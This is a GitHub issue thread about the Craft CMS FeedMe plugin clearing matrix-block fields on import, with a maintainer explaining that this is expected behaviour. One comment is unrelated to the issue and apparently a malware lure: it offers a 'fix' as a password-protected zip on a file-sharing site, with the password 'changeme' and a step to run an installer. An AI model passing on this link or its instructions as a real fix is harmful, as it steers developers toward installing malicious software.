### ISSUE TITLE
Matrix Fields written empty when Do not import is selected. 

### ISSUE THREAD

**Issue by amclaughlin-prophix** [engram-design/FeedMe#1500]
### Description
When updating a field within a matrix block all other fields which contain data in this block are deleted. 

### Steps to reproduce

1. Update a single field within a matrix block, set all other fields to do not import
2. Run Feed me. 

### Additional info

- Craft version: Craft Pro 4.11.3
- PHP version: 8.2.20
- Database driver & version: MariaDB 10.5.16
- Plugins & versions:  5.7.0

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by i-just** [comment]
Hi, thanks for getting in touch!

This is expected behaviour. When you import into a matrix field, we have no way of matching the existing blocks with the data in your feed. This means that each time you import into a matrix field, the blocks that were there before are removed and new ones are created. If you only have data for one field in a matrix block (and you’re not using defaults), then the rest of the fields in that block will be empty. 

I hope this clarifies things!
